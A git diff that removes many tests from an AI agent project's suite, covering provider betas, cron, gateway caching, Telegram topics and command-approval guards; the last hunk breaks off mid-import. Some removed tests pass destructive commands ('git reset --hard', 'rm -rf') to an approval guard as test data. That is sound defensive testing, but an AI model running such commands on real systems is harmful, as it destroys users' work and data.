diff --git a/tests/agent/test_bedrock_1m_context.py b/tests/agent/test_bedrock_1m_context.py index 988fafedf0..7d9753831e 100644 --- a/tests/agent/test_bedrock_1m_context.py +++ b/tests/agent/test_bedrock_1m_context.py @@ -15,24 +15,7 @@ from unittest.mock import MagicMock, patch class TestBedrockContext1MBeta: """``context-1m-2025-08-07`` must reach Bedrock Claude requests.""" - def test_common_betas_includes_1m(self): - from agent.anthropic_adapter import _COMMON_BETAS, _CONTEXT_1M_BETA - assert _CONTEXT_1M_BETA == "context-1m-2025-08-07" - assert _CONTEXT_1M_BETA in _COMMON_BETAS - - def test_common_betas_for_native_anthropic_includes_1m(self): - """Native Anthropic endpoints (and Bedrock with empty base_url) get 1M.""" - from agent.anthropic_adapter import ( - _common_betas_for_base_url, - _CONTEXT_1M_BETA, - ) - - assert _CONTEXT_1M_BETA in _common_betas_for_base_url(None) - assert _CONTEXT_1M_BETA in _common_betas_for_base_url("") - assert _CONTEXT_1M_BETA in _common_betas_for_base_url( - "https://api.anthropic.com" - ) def test_common_betas_strips_1m_for_minimax(self): """MiniMax bearer-auth endpoints host their own models — strip 1M beta.""" @@ -79,27 +62,3 @@ class TestBedrockContext1MBeta: assert "interleaved-thinking-2025-05-14" in beta_header assert "fine-grained-tool-streaming-2025-05-14" in beta_header - def test_build_anthropic_kwargs_includes_1m_for_bedrock_fastmode(self): - """Fast-mode requests (per-request extra_headers) still include 1M beta. - - Per-request extra_headers override client-level default_headers, so - the fast-mode path must re-include everything in _COMMON_BETAS. - """ - from agent.anthropic_adapter import build_anthropic_kwargs - - kwargs = build_anthropic_kwargs( - model="claude-opus-4-7", - messages=[{"role": "user", "content": "hi"}], - tools=None, - max_tokens=1024, - reasoning_config=None, - is_oauth=False, - # Empty base_url mirrors AnthropicBedrock (no HTTP base URL) - base_url=None, - fast_mode=True, - ) - beta_header = kwargs.get("extra_headers", {}).get("anthropic-beta", "") - assert "context-1m-2025-08-07" in beta_header, ( - "fast-mode extra_headers must carry the 1M beta or it overrides " - "client-level default_headers and Bedrock drops back to 200K" - ) diff --git a/tests/agent/test_unsupported_parameter_retry.py b/tests/agent/test_unsupported_parameter_retry.py index 99745dc120..d8f9e53c42 100644 --- a/tests/agent/test_unsupported_parameter_retry.py +++ b/tests/agent/test_unsupported_parameter_retry.py @@ -115,37 +115,6 @@ class TestMaxTokensRetryHardening: # Only the initial attempt — no retry because the gate blocked it assert client.chat.completions.create.call_count == 1 - def test_sync_max_tokens_retry_matches_generic_phrasing(self): - """A 400 saying "Unknown parameter: max_tokens" (not the legacy - substring ``"max_tokens"`` bare + no ``unsupported_parameter`` token) - now triggers the retry via the generic helper. - """ - client = MagicMock() - client.base_url = "https://api.openai.com/v1" - err = RuntimeError("Unknown parameter: max_tokens") - response = _dummy_response() - client.chat.completions.create.side_effect = [err, response] - - with ( - patch("agent.auxiliary_client._resolve_task_provider_model", - return_value=("openai-codex", "gpt-5.5", None, None, None)), - patch("agent.auxiliary_client._get_cached_client", - return_value=(client, "gpt-5.5")), - patch("agent.auxiliary_client._validate_llm_response", - side_effect=lambda resp, _task: resp), - ): - result = call_llm( - task="session_search", - messages=[{"role": "user", "content": "hi"}], - temperature=0.3, - max_tokens=512, - ) - - assert result is response - assert client.chat.completions.create.call_count == 2 - second_call = client.chat.completions.create.call_args_list[1] - assert "max_tokens" not in second_call.kwargs - assert second_call.kwargs["max_completion_tokens"] == 512 @pytest.mark.asyncio async def test_async_max_tokens_retry_skipped_when_max_tokens_is_none(self): @@ -171,31 +140,3 @@ class TestMaxTokensRetryHardening: assert client.chat.completions.create.call_count == 1 - @pytest.mark.asyncio - async def test_async_max_tokens_retry_matches_generic_phrasing(self): - client = MagicMock() - client.base_url = "https://api.openai.com/v1" - err = RuntimeError("Unknown parameter: max_tokens") - response = _dummy_response() - client.chat.completions.create = AsyncMock(side_effect=[err, response]) - - with ( - patch("agent.auxiliary_client._resolve_task_provider_model", - return_value=("openai-codex", "gpt-5.5", None, None, None)), - patch("agent.auxiliary_client._get_cached_client", - return_value=(client, "gpt-5.5")), - patch("agent.auxiliary_client._validate_llm_response", - side_effect=lambda resp, _task: resp), - ): - result = await async_call_llm( - task="session_search", - messages=[{"role": "user", "content": "hi"}], - temperature=0.3, - max_tokens=512, - ) - - assert result is response - assert client.chat.completions.create.await_count == 2 - second_call = client.chat.completions.create.call_args_list[1] - assert "max_tokens" not in second_call.kwargs - assert second_call.kwargs["max_completion_tokens"] == 512 diff --git a/tests/cron/test_cron_script.py b/tests/cron/test_cron_script.py index d7f278aa96..2905339bec 100644 --- a/tests/cron/test_cron_script.py +++ b/tests/cron/test_cron_script.py @@ -213,19 +213,6 @@ class TestBuildJobPromptWithScript: assert "## Script Output" not in prompt assert "Simple job." in prompt - def test_script_empty_output_noted(self, cron_env): - from cron.scheduler import _build_job_prompt - - script = cron_env / "scripts" / "noop.py" - script.write_text("# nothing\n") - - job = { - "prompt": "Check status.", - "script": str(script), - } - prompt = _build_job_prompt(job) - assert "no output" in prompt.lower() - assert "Check status." in prompt class TestCronjobToolScript: diff --git a/tests/cron/test_scheduler_mcp_init.py b/tests/cron/test_scheduler_mcp_init.py index 233cdc45b7..b751f0f00b 100644 --- a/tests/cron/test_scheduler_mcp_init.py +++ b/tests/cron/test_scheduler_mcp_init.py @@ -20,94 +20,8 @@ from unittest.mock import patch, MagicMock import pytest -def test_run_job_calls_discover_mcp_tools_before_agent_construction(): - """The LLM-path branch of run_job must call discover_mcp_tools() before - the AIAgent construction, so MCP tools are in the registry by the time - the agent asks for its tool schema.""" - from cron import scheduler - - job = { - "id": "mcp-cron-test", - "name": "mcp-cron-test", - "prompt": "test", - } - - call_order = [] - - def fake_discover(): - call_order.append("discover_mcp_tools") - return ["mcp_server1_tool"] - - # AIAgent is a class; replace with a recording stub - class _FakeAgent: - def __init__(self, *args, **kwargs): - call_order.append("AIAgent.__init__") - self._kwargs = kwargs - self._interrupt_requested = False - self.quiet_mode = True - - def run_conversation(self, *args, **kwargs): - return { - "final_response": "ok", - "messages": [], - } - - with patch("tools.mcp_tool.discover_mcp_tools", side_effect=fake_discover), \ - patch("run_agent.AIAgent", _FakeAgent), \ - patch("cron.scheduler._resolve_cron_enabled_toolsets", return_value=None): - scheduler.run_job(job) - - # Discovery must be called, and must be called BEFORE agent construction. - assert "discover_mcp_tools" in call_order, ( - "run_job did not call discover_mcp_tools — MCP tools unavailable in cron" - ) - d_idx = call_order.index("discover_mcp_tools") - a_idx = call_order.index("AIAgent.__init__") - assert d_idx < a_idx, ( - f"discover_mcp_tools was called AFTER AIAgent construction " - f"(indices discover={d_idx}, agent={a_idx}); MCP tools missed the " - f"registry window. Full order: {call_order}" - ) -def test_run_job_tolerates_discover_mcp_tools_failure(): - """A broken MCP server must not kill an otherwise working cron job. - discover_mcp_tools() raising should be caught and logged, and the agent - should still run.""" - from cron import scheduler - - job = { - "id": "mcp-cron-fail", - "name": "mcp-cron-fail", - "prompt": "test", - } - - agent_was_constructed = [] - - class _FakeAgent: - def __init__(self, *args, **kwargs): - agent_was_constructed.append(True) - self._interrupt_requested = False - self.quiet_mode = True - - def run_conversation(self, *args, **kwargs): - return {"final_response": "ok", "messages": []} - - def fake_discover_that_raises(): - raise RuntimeError("MCP server unreachable") - - with patch( - "tools.mcp_tool.discover_mcp_tools", - side_effect=fake_discover_that_raises, - ), patch("run_agent.AIAgent", _FakeAgent), \ - patch("cron.scheduler._resolve_cron_enabled_toolsets", return_value=None): - # Should NOT raise - success, doc, final_response, error = scheduler.run_job(job) - - assert agent_was_constructed, ( - "AIAgent was not constructed after discover_mcp_tools raised — " - "MCP failure incorrectly killed the cron job" - ) def test_no_agent_cron_job_does_not_initialize_mcp(): diff --git a/tests/gateway/test_agent_cache.py b/tests/gateway/test_agent_cache.py index fad7e6c1cf..a9793f4d9a 100644 --- a/tests/gateway/test_agent_cache.py +++ b/tests/gateway/test_agent_cache.py @@ -956,43 +956,6 @@ class TestAgentCacheSpilloverLive: except Exception: pass - def test_concurrent_inserts_settle_at_cap(self, monkeypatch): - """Many threads inserting in parallel end with len(cache) == CAP.""" - from gateway import run as gw_run - - CAP = 16 - monkeypatch.setattr(gw_run, "_AGENT_CACHE_MAX_SIZE", CAP) - runner = self._runner() - - N_THREADS = 8 - PER_THREAD = 20 # 8 * 20 = 160 inserts into a 16-slot cache - - def worker(tid: int): - for j in range(PER_THREAD): - a = self._real_agent() - key = f"t{tid}-s{j}" - with runner._agent_cache_lock: - runner._agent_cache[key] = (a, "sig") - runner._enforce_agent_cache_cap() - - threads = [ - threading.Thread(target=worker, args=(t,), daemon=True) - for t in range(N_THREADS) - ] - for t in threads: - t.start() - for t in threads: - t.join(timeout=30) - assert not t.is_alive(), "Worker thread hung — possible deadlock?" - - # Let daemon cleanup threads settle. - import time as _t - _t.sleep(0.5) - - assert len(runner._agent_cache) == CAP, ( - f"Expected exactly {CAP} entries after concurrent inserts, " - f"got {len(runner._agent_cache)}." - ) def test_evicted_session_next_turn_gets_fresh_agent(self, monkeypatch): """After eviction, the same session_key can insert a fresh agent. diff --git a/tests/gateway/test_api_server_runs.py b/tests/gateway/test_api_server_runs.py index f47060d068..bdb00d74a7 100644 --- a/tests/gateway/test_api_server_runs.py +++ b/tests/gateway/test_api_server_runs.py @@ -307,69 +307,6 @@ class TestRunEvents: assert "Hello!" in body - @pytest.mark.asyncio - async def test_approval_request_event_and_response_unblock_run(self, adapter): - """Dangerous-command approvals should surface on the run SSE stream.""" - app = _create_runs_app(adapter) - async with TestClient(TestServer(app)) as cli: - with patch.object(adapter, "_create_agent") as mock_create: - guard_result = {} - - mock_agent = MagicMock() - - def _run_with_approval(user_message=None, conversation_history=None, task_id=None): - from tools.approval import check_all_command_guards - - result = check_all_command_guards("git reset --hard HEAD", "local") - guard_result.update(result) - return {"final_response": "approved" if result.get("approved") else "blocked"} - - mock_agent.run_conversation.side_effect = _run_with_approval - mock_agent.session_prompt_tokens = 0 - mock_agent.session_completion_tokens = 0 - mock_agent.session_total_tokens = 0 - mock_create.return_value = mock_agent - - resp = await cli.post("/v1/runs", json={"input": "needs approval"}) - assert resp.status == 202 - data = await resp.json() - run_id = data["run_id"] - - events_resp = await cli.get(f"/v1/runs/{run_id}/events") - assert events_resp.status == 200 - - approval_event = None - for _ in range(20): - line = await asyncio.wait_for(events_resp.content.readline(), timeout=3.0) - text = line.decode() - if not text.startswith("data: "): - continue - event = json.loads(text[len("data: "):]) - if event.get("event") == "approval.request": - approval_event = event - break - - assert approval_event is not None - assert approval_event["run_id"] == run_id - assert approval_event["command"] == "git reset --hard HEAD" - assert approval_event["pattern_key"] - assert "pattern_keys" in approval_event - assert approval_event["choices"] == ["once", "session", "always", "deny"] - - approval_resp = await cli.post( - f"/v1/runs/{run_id}/approval", - json={"choice": "once"}, - ) - assert approval_resp.status == 200 - approval_data = await approval_resp.json() - assert approval_data["resolved"] == 1 - assert approval_data["choice"] == "once" - - body = await events_resp.text() - assert "approval.responded" in body - assert "run.completed" in body - - assert guard_result.get("approved") is True @pytest.mark.asyncio async def test_approval_response_without_pending_returns_409(self, adapter): diff --git a/tests/gateway/test_discord_free_response.py b/tests/gateway/test_discord_free_response.py index f3242e3d5d..91b23bd860 100644 --- a/tests/gateway/test_discord_free_response.py +++ b/tests/gateway/test_discord_free_response.py @@ -446,31 +446,6 @@ async def test_discord_voice_linked_channel_skips_mention_requirement_and_auto_t assert event.source.chat_type == "group" -@pytest.mark.asyncio -async def test_discord_free_channel_skips_auto_thread(adapter, monkeypatch): - """Free-response channels must NOT auto-create threads — bot replies inline. - - Without this, every message in a free-response channel would spin off a - thread (since the channel bypasses the @mention gate), defeating the - lightweight-chat purpose of free-response mode. - """ - monkeypatch.setenv("DISCORD_REQUIRE_MENTION", "true") - monkeypatch.setenv("DISCORD_FREE_RESPONSE_CHANNELS", "789") - monkeypatch.delenv("DISCORD_AUTO_THREAD", raising=False) # default true - - adapter._auto_create_thread = AsyncMock() - - message = make_message( - channel=FakeTextChannel(channel_id=789), - content="free chat message", - ) - - await adapter._handle_message(message) - - adapter._auto_create_thread.assert_not_awaited() - adapter.handle_message.assert_awaited_once() - event = adapter.handle_message.await_args.args[0] - assert event.source.chat_type == "group" @pytest.mark.asyncio diff --git a/tests/gateway/test_google_chat.py b/tests/gateway/test_google_chat.py index 140c11b6b5..4b0d73d0ea 100644 --- a/tests/gateway/test_google_chat.py +++ b/tests/gateway/test_google_chat.py @@ -257,42 +257,9 @@ class TestEnvConfigLoading: for v in self._ENV_VARS: monkeypatch.delenv(v, raising=False) - def test_project_id_primary(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CHAT_PROJECT_ID", "my-proj") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION_NAME", - "projects/my-proj/subscriptions/my-sub") - cfg = load_gateway_config() - gc = cfg.platforms[Platform.GOOGLE_CHAT] - assert gc.enabled is True - assert gc.extra["project_id"] == "my-proj" - def test_project_id_falls_back_to_google_cloud_project(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CLOUD_PROJECT", "fallback-proj") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION", - "projects/fallback-proj/subscriptions/s") - cfg = load_gateway_config() - gc = cfg.platforms[Platform.GOOGLE_CHAT] - assert gc.extra["project_id"] == "fallback-proj" - def test_subscription_accepts_legacy_alias(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CHAT_PROJECT_ID", "p") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION", "projects/p/subscriptions/s") - cfg = load_gateway_config() - gc = cfg.platforms[Platform.GOOGLE_CHAT] - assert gc.extra["subscription_name"] == "projects/p/subscriptions/s" - def test_sa_path_falls_back_to_google_application_credentials(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CHAT_PROJECT_ID", "p") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION_NAME", - "projects/p/subscriptions/s") - monkeypatch.setenv("GOOGLE_APPLICATION_CREDENTIALS", "/opt/sa.json") - cfg = load_gateway_config() - gc = cfg.platforms[Platform.GOOGLE_CHAT] - assert gc.extra["service_account_json"] == "/opt/sa.json" def test_missing_subscription_does_not_enable(self, monkeypatch): self._clean_env(monkeypatch) @@ -308,24 +275,7 @@ class TestEnvConfigLoading: cfg = load_gateway_config() assert Platform.GOOGLE_CHAT not in cfg.platforms - def test_home_channel_populated(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CHAT_PROJECT_ID", "p") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION_NAME", - "projects/p/subscriptions/s") - monkeypatch.setenv("GOOGLE_CHAT_HOME_CHANNEL", "spaces/HOME") - cfg = load_gateway_config() - gc = cfg.platforms[Platform.GOOGLE_CHAT] - assert gc.home_channel is not None - assert gc.home_channel.chat_id == "spaces/HOME" - def test_connected_platforms_recognises_via_extras(self, monkeypatch): - self._clean_env(monkeypatch) - monkeypatch.setenv("GOOGLE_CHAT_PROJECT_ID", "p") - monkeypatch.setenv("GOOGLE_CHAT_SUBSCRIPTION_NAME", - "projects/p/subscriptions/s") - cfg = load_gateway_config() - assert Platform.GOOGLE_CHAT in cfg.get_connected_platforms() # =========================================================================== diff --git a/tests/gateway/test_telegram_topic_mode.py b/tests/gateway/test_telegram_topic_mode.py index bfa92b4fd0..7c2171c0ae 100644 --- a/tests/gateway/test_telegram_topic_mode.py +++ b/tests/gateway/test_telegram_topic_mode.py @@ -706,37 +706,6 @@ async def test_first_message_inside_topic_records_topic_binding(tmp_path, monkey assert binding["session_key"] == build_session_key(_make_source(thread_id="17585")) -@pytest.mark.asyncio -async def test_topic_root_command_checks_getme_capabilities_before_enabling(tmp_path, monkeypatch): - import gateway.run as gateway_run - - session_db = SessionDB(db_path=tmp_path / "state.db") - runner = _make_runner(session_db=session_db) - bot = AsyncMock() - bot.get_me.return_value = SimpleNamespace( - has_topics_enabled=False, - allows_users_to_create_topics=True, - ) - runner.adapters[Platform.TELEGRAM]._bot = bot - runner._run_agent = AsyncMock( - side_effect=AssertionError("/topic capability failure must not enter the agent loop") - ) - - monkeypatch.setattr( - gateway_run, "_resolve_runtime_agent_kwargs", lambda: {"api_key": "***"} - ) - - result = await runner._handle_message(_make_event("/topic")) - - assert "topics are not enabled" in result - assert "Open @BotFather" in result - assert session_db.is_telegram_topic_mode_enabled(chat_id="208214988", user_id="208214988") is False - bot.get_me.assert_awaited_once() - runner.adapters[Platform.TELEGRAM].send_image_file.assert_awaited_once() - image_kwargs = runner.adapters[Platform.TELEGRAM].send_image_file.await_args.kwargs - assert image_kwargs["chat_id"] == "208214988" - assert image_kwargs["image_path"].endswith("telegram-botfather-threads-settings.jpg") - runner._run_agent.assert_not_called() @pytest.mark.asyncio @@ -1076,40 +1045,5 @@ async def test_topic_refuses_unauthorized_user(tmp_path, monkeypatch): assert tables == set() -def test_capability_hint_is_debounced_per_chat(tmp_path): - """BotFather screenshot is sent once per cooldown window per chat.""" - db = SessionDB(db_path=tmp_path / "state.db") - runner = _make_runner(session_db=db) - - source = _make_source() - assert runner._should_send_telegram_capability_hint(source) is True - assert runner._should_send_telegram_capability_hint(source) is False - assert runner._should_send_telegram_capability_hint(source) is False - - from dataclasses import replace - other = replace(source, chat_id="999999999") - assert runner._should_send_telegram_capability_hint(other) is True -def test_topic_off_resets_debounce_counters(tmp_path): - """Disabling topic mode clears per-chat debounce state.""" - db = SessionDB(db_path=tmp_path / "state.db") - db.enable_telegram_topic_mode(chat_id="208214988", user_id="208214988") - runner = _make_runner(session_db=db) - - source = _make_source() - # Prime the debounce counters. - assert runner._should_send_telegram_lobby_reminder(source) is True - assert runner._should_send_telegram_capability_hint(source) is True - assert runner._should_send_telegram_lobby_reminder(source) is False - assert runner._should_send_telegram_capability_hint(source) is False - - # /topic off resets them. - result = runner._disable_telegram_topic_mode_for_chat(source) - assert "OFF" in result or "off" in result - - # Re-enable and verify counters reset (so the first reminder/hint - # after re-enabling can land immediately). - db.enable_telegram_topic_mode(chat_id="208214988", user_id="208214988") - assert runner._should_send_telegram_lobby_reminder(source) is True - assert runner._should_send_telegram_capability_hint(source) is True diff --git a/tests/hermes_cli/test_model_provider_persistence.py b/tests/hermes_cli/test_model_provider_persistence.py index 8808e009b4..20f81d62d8 100644 --- a/tests/hermes_cli/test_model_provider_persistence.py +++ b/tests/hermes_cli/test_model_provider_persistence.py @@ -286,32 +286,6 @@ class TestProviderPersistsAfterModelSave: assert model.get("default") == "minimax-m2.5" assert model.get("api_mode") == "anthropic_messages" - def test_lmstudio_provider_saved_when_selected(self, config_home, monkeypatch): - from hermes_cli.config import load_config - from hermes_cli.main import _model_flow_api_key_provider - - monkeypatch.setenv("LM_API_KEY", "lm-token") - monkeypatch.setattr( - "hermes_cli.auth._prompt_model_selection", - lambda models, current_model="": "publisher/model-a", - ) - monkeypatch.setattr("hermes_cli.auth.deactivate_provider", lambda: None) - monkeypatch.setattr( - "hermes_cli.models.fetch_lmstudio_models", - lambda api_key=None, base_url=None, timeout=5.0: ["publisher/model-a"], - ) - - with patch("builtins.input", side_effect=[""]): - _model_flow_api_key_provider(load_config(), "lmstudio", "old-model") - - import yaml - - config = yaml.safe_load((config_home / "config.yaml").read_text()) or {} - model = config.get("model") - assert isinstance(model, dict) - assert model.get("provider") == "lmstudio" - assert model.get("base_url") == "http://127.0.0.1:1234/v1" - assert model.get("default") == "publisher/model-a" class TestBaseUrlValidation: @@ -386,32 +360,3 @@ class TestBaseUrlValidation: saved = get_env_value("GLM_BASE_URL") or "" assert saved == "", "Empty input should not save a base URL" - def test_stepfun_provider_saved_with_selected_region(self, config_home, monkeypatch): - from hermes_cli.main import _model_flow_stepfun - from hermes_cli.config import load_config, get_env_value - - monkeypatch.setenv("STEPFUN_API_KEY", "stepfun-test-key") - - with patch( - "hermes_cli.main._prompt_provider_choice", - return_value=1, - ), patch( - "hermes_cli.models.fetch_api_models", - return_value=["step-3.5-flash", "step-3-agent-lite"], - ), patch( - "hermes_cli.auth._prompt_model_selection", - return_value="step-3-agent-lite", - ), patch( - "hermes_cli.auth.deactivate_provider", - ): - _model_flow_stepfun(load_config(), "old-model") - - import yaml - - config = yaml.safe_load((config_home / "config.yaml").read_text()) or {} - model = config.get("model") - assert isinstance(model, dict) - assert model.get("provider") == "stepfun" - assert model.get("default") == "step-3-agent-lite" - assert model.get("base_url") == "https://api.stepfun.com/step_plan/v1" - assert get_env_value("STEPFUN_BASE_URL") == "https://api.stepfun.com/step_plan/v1" diff --git a/tests/hermes_cli/test_model_validation.py b/tests/hermes_cli/test_model_validation.py index c81cae4601..03c0fcca3d 100644 --- a/tests/hermes_cli/test_model_validation.py +++ b/tests/hermes_cli/test_model_validation.py @@ -770,15 +770,6 @@ class TestValidateCodexAutoCorrection: assert result.get("corrected_model") is None assert result["message"] is None - def test_very_different_name_falls_to_suggestions(self): - """Names too different for auto-correction are rejected with a suggestion list.""" - codex_models = ["gpt-5.4-mini", "gpt-5.4", "gpt-5.3-codex"] - with patch("hermes_cli.models.provider_model_ids", return_value=codex_models): - result = validate_requested_model("totally-wrong", "openai-codex") - assert result["accepted"] is False - assert result["recognized"] is False - assert result.get("corrected_model") is None - assert "not found" in result["message"] # -- probe_api_models — Cloudflare UA mitigation -------------------------------- diff --git a/tests/hermes_cli/test_update_yes_flag.py b/tests/hermes_cli/test_update_yes_flag.py index 66060b10aa..699d57a971 100644 --- a/tests/hermes_cli/test_update_yes_flag.py +++ b/tests/hermes_cli/test_update_yes_flag.py @@ -135,49 +135,3 @@ class TestUpdateYesConfigMigration: class TestUpdateYesStashRestore: """--yes auto-restores the pre-update autostash without prompting.""" - @patch("hermes_cli.main._restore_stashed_changes") - @patch( - "hermes_cli.main._stash_local_changes_if_needed", - return_value="stash@{0}", - ) - @patch("hermes_cli.config.check_config_version", return_value=(1, 1)) - @patch("hermes_cli.config.get_missing_config_fields", return_value=[]) - @patch("hermes_cli.config.get_missing_env_vars", return_value=[]) - @patch("shutil.which", return_value=None) - @patch("subprocess.run") - def test_yes_restores_stash_without_prompting( - self, - mock_run, - _mock_which, - _mock_missing_env, - _mock_missing_cfg, - _mock_version, - _mock_stash, - mock_restore, - capsys, - ): - # Not on main → cmd_update switches to main → autostash fires. - mock_run.side_effect = _make_run_side_effect( - branch="feature-branch", verify_ok=True, commit_count="1", dirty=True - ) - - args = SimpleNamespace(yes=True) - - # Force a TTY-shaped session so the autostash-restore branch is - # reachable in CI workers regardless of inherited stdio (matches the - # isatty patching strategy in ``test_no_yes_flag_still_prompts_in_tty`` - # — ``patch.object`` on the real streams is robust under xdist). - import sys as _sys - - with patch.object(_sys.stdin, "isatty", return_value=True), patch.object( - _sys.stdout, "isatty", return_value=True - ): - cmd_update(args) - - # _restore_stashed_changes was called, and called with prompt_user=False - # every time (so the user never sees "Restore local changes now?"). - assert mock_restore.called - for call in mock_restore.call_args_list: - assert call.kwargs.get("prompt_user") is False, ( - f"Expected prompt_user=False under --yes, got {call.kwargs}" - ) diff --git a/tests/run_agent/test_concurrent_interrupt.py b/tests/run_agent/test_concurrent_interrupt.py index 9a6ba73e7e..747ecb7ca2 100644 --- a/tests/run_agent/test_concurrent_interrupt.py +++ b/tests/run_agent/test_concurrent_interrupt.py @@ -97,45 +97,6 @@ class _FakeAssistantMsg: self.tool_calls = tool_calls -def test_concurrent_interrupt_cancels_pending(monkeypatch): - """When _interrupt_requested is set during concurrent execution, - the wait loop should exit early and cancelled tools get interrupt messages.""" - agent = _make_agent(monkeypatch) - - # Create a tool that blocks until interrupted - barrier = threading.Event() - - original_invoke = agent._invoke_tool - - def slow_tool(name, args, task_id, call_id=None): - if name == "slow_one": - # Block until the test sets the interrupt - barrier.wait(timeout=10) - return '{"slow": true}' - return '{"fast": true}' - - agent._invoke_tool = MagicMock(side_effect=slow_tool) - - tc1 = _FakeToolCall("fast_one", call_id="tc_fast") - tc2 = _FakeToolCall("slow_one", call_id="tc_slow") - msg = _FakeAssistantMsg([tc1, tc2]) - messages = [] - - def _set_interrupt_after_delay(): - time.sleep(0.3) - agent._interrupt_requested = True - barrier.set() # unblock the slow tool - - t = threading.Thread(target=_set_interrupt_after_delay) - t.start() - - agent._execute_tool_calls_concurrent(msg, messages, "test_task") - t.join() - - # Both tools should have results in messages - assert len(messages) == 2 - # The interrupt was detected - assert agent._interrupt_requested is True def test_concurrent_preflight_interrupt_skips_all(monkeypatch): @@ -158,85 +119,6 @@ def test_concurrent_preflight_interrupt_skips_all(monkeypatch): agent._invoke_tool.assert_not_called() -def test_running_concurrent_worker_sees_is_interrupted(monkeypatch): - """Regression guard for the "interrupt-doesn't-reach-hung-tool" class of - bug Physikal reported in April 2026. - - Before this fix, `AIAgent.interrupt()` called `_set_interrupt(True, - _execution_thread_id)` — which only flagged the agent's *main* thread. - Tools running inside `_execute_tool_calls_concurrent` execute on - ThreadPoolExecutor worker threads whose tids are NOT the agent's, so - `is_interrupted()` (which checks the *current* thread's tid) returned - False inside those tools no matter how many times the gateway called - `.interrupt()`. Hung ssh / long curl / big make-build tools would run - to their own timeout. - - This test runs a fake tool in the concurrent path that polls - `is_interrupted()` like a real terminal command does, then calls - `agent.interrupt()` from another thread, and asserts the poll sees True - within one second. - """ - from tools.interrupt import is_interrupted - - agent = _make_agent(monkeypatch) - - # Counter plus observation hooks so we can prove the worker saw the flip. - observed = {"saw_true": False, "poll_count": 0, "worker_tid": None} - worker_started = threading.Event() - - def polling_tool(name, args, task_id, call_id=None, messages=None): - observed["worker_tid"] = threading.current_thread().ident - worker_started.set() - deadline = time.monotonic() + 5.0 - while time.monotonic() < deadline: - observed["poll_count"] += 1 - if is_interrupted(): - observed["saw_true"] = True - return '{"interrupted": true}' - time.sleep(0.05) - return '{"timed_out": true}' - - agent._invoke_tool = MagicMock(side_effect=polling_tool) - - tc1 = _FakeToolCall("hung_fake_tool_1", call_id="tc1") - tc2 = _FakeToolCall("hung_fake_tool_2", call_id="tc2") - msg = _FakeAssistantMsg([tc1, tc2]) - messages = [] - - def _interrupt_after_start(): - # Wait until at least one worker is running so its tid is tracked. - worker_started.wait(timeout=2.0) - time.sleep(0.2) # let the other worker enter too - agent.interrupt("stop requested by test") - - t = threading.Thread(target=_interrupt_after_start) - t.start() - start = time.monotonic() - agent._execute_tool_calls_concurrent(msg, messages, "test_task") - elapsed = time.monotonic() - start - t.join(timeout=2.0) - - # The worker must have actually polled is_interrupted — otherwise the - # test isn't exercising what it claims to. - assert observed["poll_count"] > 0, ( - "polling_tool never ran — test scaffold issue" - ) - # The worker must see the interrupt within ~1 s of agent.interrupt() - # being called. Before the fix this loop ran until its 5 s own-timeout. - assert observed["saw_true"], ( - f"is_interrupted() never returned True inside the concurrent worker " - f"after agent.interrupt() — interrupt-propagation hole regressed. " - f"worker_tid={observed['worker_tid']!r} poll_count={observed['poll_count']}" - ) - assert elapsed < 3.0, ( - f"concurrent execution took {elapsed:.2f}s after interrupt — the fan-out " - f"to worker tids didn't shortcut the tool's poll loop as expected" - ) - # Also verify cleanup: no stale worker tids should remain after all - # tools finished. - assert agent._tool_worker_threads == set(), ( - f"worker tids leaked after run: {agent._tool_worker_threads}" - ) def test_clear_interrupt_clears_worker_tids(monkeypatch): diff --git a/tests/tools/test_approval_heartbeat.py b/tests/tools/test_approval_heartbeat.py index d54a5b1421..c725a24eb4 100644 --- a/tests/tools/test_approval_heartbeat.py +++ b/tests/tools/test_approval_heartbeat.py @@ -59,151 +59,5 @@ class TestApprovalHeartbeat: os.environ[k] = v _clear_approval_state() - def test_heartbeat_fires_while_waiting_for_approval(self): - """touch_activity_if_due is called repeatedly during the wait.""" - from tools.approval import ( - check_all_command_guards, - register_gateway_notify, - resolve_gateway_approval, - ) - register_gateway_notify(self.SESSION_KEY, lambda _payload: None) - # Use an Event to signal from _fake_touch back to the main thread - # so we can resolve as soon as the first heartbeat fires — avoids - # flakiness from fixed sleeps racing against thread startup. - first_heartbeat = threading.Event() - heartbeat_calls: list[str] = [] - - def _fake_touch(state, label): - # Bypass the 10s throttle so the heartbeat fires every loop - # iteration; we're measuring whether the call happens at all. - heartbeat_calls.append(label) - state["last_touch"] = 0.0 - first_heartbeat.set() - - result_holder: dict = {} - - def _run_check(): - try: - with patch( - "tools.environments.base.touch_activity_if_due", - side_effect=_fake_touch, - ): - result_holder["result"] = check_all_command_guards( - "rm -rf /tmp/nonexistent-heartbeat-target", "local" - ) - except Exception as exc: # pragma: no cover - result_holder["exc"] = exc - - thread = threading.Thread(target=_run_check, daemon=True) - thread.start() - - # Wait for at least one heartbeat to fire — bounded at 10s to catch - # a genuinely hung worker thread without making a green run slow. - assert first_heartbeat.wait(timeout=10.0), ( - "no heartbeat fired within 10s — the approval wait is blocking " - "without firing activity pings, which is the exact bug this " - "test exists to catch" - ) - - # Resolve the approval so the thread exits cleanly. - resolve_gateway_approval(self.SESSION_KEY, "once") - thread.join(timeout=5) - - assert not thread.is_alive(), "approval wait did not exit after resolve" - assert "exc" not in result_holder, ( - f"check_all_command_guards raised: {result_holder.get('exc')!r}" - ) - - # The fix: heartbeats fire while waiting. Before the fix this list - # was empty because event.wait() blocked for the full timeout with - # no activity pings. - assert heartbeat_calls, "expected at least one heartbeat" - assert all( - call == "waiting for user approval" for call in heartbeat_calls - ), f"unexpected heartbeat labels: {set(heartbeat_calls)}" - - # Sanity: the approval was resolved with "once" → command approved. - assert result_holder["result"]["approved"] is True - - def test_wait_returns_immediately_on_user_response(self): - """Polling slices don't delay responsiveness — resolve is near-instant.""" - from tools.approval import ( - check_all_command_guards, - has_blocking_approval, - 